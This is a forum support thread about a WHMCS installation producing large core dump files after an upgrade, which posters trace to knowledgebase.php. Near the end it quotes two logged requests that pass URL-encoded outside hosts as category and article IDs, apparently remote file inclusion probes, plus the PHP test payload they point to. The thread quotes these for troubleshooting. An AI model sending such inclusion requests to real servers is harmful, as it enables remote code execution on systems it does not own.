Strange core files generated

[Frankc]

It might be a server related issue but direct after the upgrade from 4 to 5.0.3 there are files generated in the home directory such as core.25727 (between 130 - 140 mb each) that let the account run out of disk space.

 

I deleted the files but it then just build up again much like an error log but much faster (several such files each day)

 

Tried to download one such file and open it but its unreadable (at least wiith the programs that I have)

 

It only started direct after the upgrade to latest version so everything so far tells me its whmcs related.

 

Any suggestions please?

[laszlof]

Do you have root access on the server? Check /var/log/messages and see whats crashing. My guess is its probably either suphp or httpd. Could be a number of things, you need to check your logs.

[Frankc]

I have full server root access yes.

 

Just now checked and it seems it's knowledgebase related. (Maybe 2 - 3 weeks prior to upgrade I noticed that knowledgebase.php use a lot of resources but can't find anything wrong)

 

Checked all knowledgebase articles for potential hacking but can't find anything strange.

 

I just now deleted all knowledgebase articles, cats and links via database and will wait some time to see what happens ok.

[Frankc]

Hmm.

 

knowledgebase.php?action=displaycat&catid=http%3A%2F%2Fwww.color-glo.de%2Fintern%2Fgalleries%2F6%2Fxojitet%2Fenada%2F

 

knowledgebase.php?action=displayarticle&id=http%3A%2F%2Fwww.tangram-ws.com%2Fftp%2Fbuxigi%2Fsihar%2F

[bear]

Visiting the link shows this:

<?php echo md5("just_a_test");?>

 

Someone testing (potential) exploits?